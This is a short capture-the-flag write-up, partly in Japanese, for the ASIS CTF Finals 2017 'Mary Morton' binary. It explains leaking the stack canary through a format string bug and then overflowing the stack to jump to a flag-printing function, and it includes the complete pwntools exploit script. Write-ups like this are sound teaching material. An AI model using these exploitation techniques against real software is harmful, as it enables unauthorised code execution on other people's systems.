ASIS CTF Finals 2017: Mary Morton

他の問題が解けないのでプロが放置してたやるだけをやってお茶を濁した回。

problem

$ nc 146.185.132.36 19153
Welcome to the battle ! 
[Great Fairy] level pwned 
Select your weapon 
1. Stack Bufferoverflow Bug 
2. Format String Bug 
3. Exit the battle 

solution

Read the canary with 2. Format String Bug, then use 1. Stack Bufferoverflow Bug to jump the function which calls system("/bin/cat ./flag");.

implementation

#!/usr/bin/env python2
from pwn import * # https://pypi.python.org/pypi/pwntools
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('host', nargs='?', default='146.185.132.36')
parser.add_argument('port', nargs='?', default=19153, type=int)
parser.add_argument('--log-level', default='debug')
parser.add_argument('--binary', default='./mary_morton')
args = parser.parse_args()
context.log_level = args.log_level
context.binary = args.binary
elf = ELF(args.binary)

system_cat_flag = 0x4008da
p = remote(args.host, args.port)

menu = '''\
1. Stack Bufferoverflow Bug 
2. Format String Bug 
3. Exit the battle 
'''

# Format String Bug
p.sendlineafter(menu, '2')
p.sendline('%23$p')
canary = int(p.recvline(), 16)

# Stack Bufferoverflow Bug
payload = ''
payload += 'A' * 0x88
payload += p64(canary)
payload += 'B' * 8
payload += p64(system_cat_flag)
p.sendlineafter(menu, '1')
p.sendline(payload)

p.recvall()